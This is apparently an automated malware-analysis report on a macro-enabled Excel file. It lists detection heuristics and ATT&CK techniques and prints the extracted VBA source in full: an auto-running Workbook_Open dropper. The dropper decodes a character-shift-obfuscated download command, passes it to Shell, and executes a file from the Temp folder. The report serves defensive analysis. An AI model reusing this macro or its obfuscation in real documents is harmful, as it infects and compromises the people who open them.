MALICIOUS
268
Risk Score
Malware Insights
MITRE ATT&CK
T1059.005 Visual Basic
T1204.002 Malicious File
T1059 Command and Scripting Interpreter
The VBA macro contains a Workbook_Open event that executes a deobfuscated Shell command. This command appears to be constructing a path to a temporary directory and then attempting to execute a file named 'Filename.exe' from that location. The obfuscation technique used suggests an attempt to evade static analysis, and the execution of an arbitrary file points to a downloader or dropper functionality.
Heuristics 7
-
VBA project inside OOXML medium 6 related findings OOXML_VBADocument contains a VBA project — VBA macros present
-
Shell() call in VBA critical OLE_VBA_SHELLShell() call in VBA
-
VBA character-shift decoded Shell command critical OLE_VBA_ASC_CHR_SHIFT_SHELLVBA auto-exec macro stores an encoded command string, decodes it with a Mid/Asc/Chr character-shift loop, and passes the recovered text to Shell. This is a high-confidence command stager.
-
Workbook_Open macro high OLE_VBA_WBOPENWorkbook_Open macro
-
CreateObject call high OLE_VBA_CREATEOBJCreateObject call
-
VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXECCompiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
-
Environ() call (env variable access) low OLE_VBA_ENVIRONEnviron() call (env variable access)
Extracted artifacts 2
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
macros.bas |
vba-macro | oletools.olevba.extract_macros (decoded VBA source from OOXML) | 1882 bytes |
SHA-256: 6903c3c4e39a3c96de1d9953e32f9b218179b778d7a92ab6b69c17b1acfde0f4 |
|||
Preview scriptFirst 1,000 lines of the extracted script
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Public Sub Workbook_Open()
CreateObject("Excel.Application").Wait (Now + TimeValue("00:00:01"))
Shell (MJeqxOcUyRcsJKKdxkvYokOLgbBlLCBnDfJISFEAMpUkLiEjJZSClBf("…„Œz‡ˆ}z��Cz�z5Bz�zxŠ‰~„ƒ…„�~xŽ5wŽ…vˆˆ5Bl5]~yyzƒ5Bx„‚‚vƒy5=ƒzŒB„w zx‰5hŽˆ‰z‚Ccz‰ClzwX�~zƒ‰>CY„Œƒ�„vy[~�z=<}‰‰…ˆODD„ƒzy‡~‹zC�~‹zCx„‚Dy„Œƒ�„vyTx~yRX[YMZFGEYILY[FVI;‡zˆ~yRX[YMZFGEYILY[FVI:GFFFIJ;vŠ‰}€zŽRVVƒ}nh^ŒŽB�`ŽH^<A9zƒ‹Oiz‚…@<q[~�zƒv‚zCz�z<>"))
CreateObject("Excel.Application").Wait (Now + TimeValue("00:00:10"))
a = Environ("Temp")
Shell (a + "\" + "Filename.exe")
End Sub
Public Function MJeqxOcUyRcsJKKdxkvYokOLgbBlLCBnDfJISFEAMpUkLiEjJZSClBf(bFnHSorNwGlBoLGFYRpsdjRemUZPOSodJeWwwvgPUoyCSFOYyCPnLaT As String)
Dim n As Integer, i As Integer
n = 21
For i = 1 To Len(bFnHSorNwGlBoLGFYRpsdjRemUZPOSodJeWwwvgPUoyCSFOYyCPnLaT)
Mid(bFnHSorNwGlBoLGFYRpsdjRemUZPOSodJeWwwvgPUoyCSFOYyCPnLaT, i, 1) = Chr(Asc(Mid(bFnHSorNwGlBoLGFYRpsdjRemUZPOSodJeWwwvgPUoyCSFOYyCPnLaT, i, 1)) - n)
Next i
MJeqxOcUyRcsJKKdxkvYokOLgbBlLCBnDfJISFEAMpUkLiEjJZSClBf = bFnHSorNwGlBoLGFYRpsdjRemUZPOSodJeWwwvgPUoyCSFOYyCPnLaT
End Function
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
|
|||
vbaProject_00.bin |
vba-project | OOXML VBA project: xl/vbaProject.bin | 14336 bytes |
SHA-256: b5bd1663b378bceb1606a842a9945b3af51843e8206e8d442199e88b4cbeb202 |
|||
Open this report in the interactive analyzer, or submit your own file for analysis.